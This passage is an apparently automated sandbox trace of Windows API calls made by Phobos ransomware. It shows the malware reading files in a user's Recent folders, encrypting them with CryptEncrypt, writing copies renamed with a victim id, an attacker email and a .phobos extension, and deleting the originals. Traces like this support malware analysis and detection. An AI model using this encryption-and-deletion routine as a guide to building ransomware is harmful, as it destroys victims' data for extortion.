lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x43a3, lpOverlapped=0x0) returned 1 [0200.464] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x43b0, dwBufLen=0x43b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x43b0) returned 1 [0200.464] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x43b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x43b0, lpOverlapped=0x0) returned 1 [0200.465] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0200.465] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.465] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0200.465] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.465] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0200.465] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.465] CloseHandle (hObject=0xac) returned 1 [0200.465] CloseHandle (hObject=0x160) returned 1 [0200.465] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms")) returned 1 [0200.467] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.468] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=6100) returned 1 [0200.468] CloseHandle (hObject=0x160) returned 1 [0200.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms")) returned 0x20 [0200.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.468] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.468] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.469] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.469] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.469] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x17d4, lpOverlapped=0x0) returned 1 [0200.470] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17e0, dwBufLen=0x17e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17e0) returned 1 [0200.470] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x17e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x17e0, lpOverlapped=0x0) returned 1 [0200.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0200.472] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.472] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0200.472] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.472] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0200.472] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.472] CloseHandle (hObject=0x160) returned 1 [0200.472] CloseHandle (hObject=0xac) returned 1 [0200.472] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms")) returned 1 [0200.473] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.474] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=24) returned 1 [0200.474] CloseHandle (hObject=0xac) returned 1 [0200.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms")) returned 0x20 [0200.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.474] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.474] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.475] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.475] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x18, lpOverlapped=0x0) returned 1 [0200.475] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0200.475] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0200.476] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0200.476] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.476] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0200.476] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.476] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0200.476] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.476] CloseHandle (hObject=0xac) returned 1 [0200.477] CloseHandle (hObject=0x160) returned 1 [0200.477] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms")) returned 1 [0200.477] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.478] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=9215) returned 1 [0200.479] CloseHandle (hObject=0x160) returned 1 [0200.479] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms")) returned 0x20 [0200.479] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.479] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.479] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.480] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.480] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x23ff, lpOverlapped=0x0) returned 1 [0200.633] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2400, dwBufLen=0x2400 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2400) returned 1 [0200.634] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2400, lpOverlapped=0x0) returned 1 [0200.635] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.635] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.635] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0200.635] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.635] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0200.635] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.635] CloseHandle (hObject=0x160) returned 1 [0200.635] CloseHandle (hObject=0xac) returned 1 [0200.635] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms")) returned 1 [0200.638] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GNE8Qh4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gne8qh4.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.639] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2582) returned 1 [0200.639] CloseHandle (hObject=0xac) returned 1 [0200.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GNE8Qh4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gne8qh4.lnk")) returned 0x20 [0200.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GNE8Qh4.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gne8qh4.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GNE8Qh4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gne8qh4.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.639] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.639] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GNE8Qh4.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gne8qh4.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.641] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.641] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.641] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa16, lpOverlapped=0x0) returned 1 [0200.643] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa20, dwBufLen=0xa20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa20) returned 1 [0200.643] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa20, lpOverlapped=0x0) returned 1 [0200.644] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.644] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.644] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.644] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.644] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.644] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.644] CloseHandle (hObject=0xac) returned 1 [0200.644] CloseHandle (hObject=0x160) returned 1 [0200.644] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GNE8Qh4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gne8qh4.lnk")) returned 1 [0200.646] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gVOV_SE5Blg8N.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gvov_se5blg8n.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.647] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2553) returned 1 [0200.647] CloseHandle (hObject=0x160) returned 1 [0200.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gVOV_SE5Blg8N.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gvov_se5blg8n.flv.lnk")) returned 0x20 [0200.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gVOV_SE5Blg8N.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gvov_se5blg8n.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gVOV_SE5Blg8N.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gvov_se5blg8n.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.648] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.648] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gVOV_SE5Blg8N.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 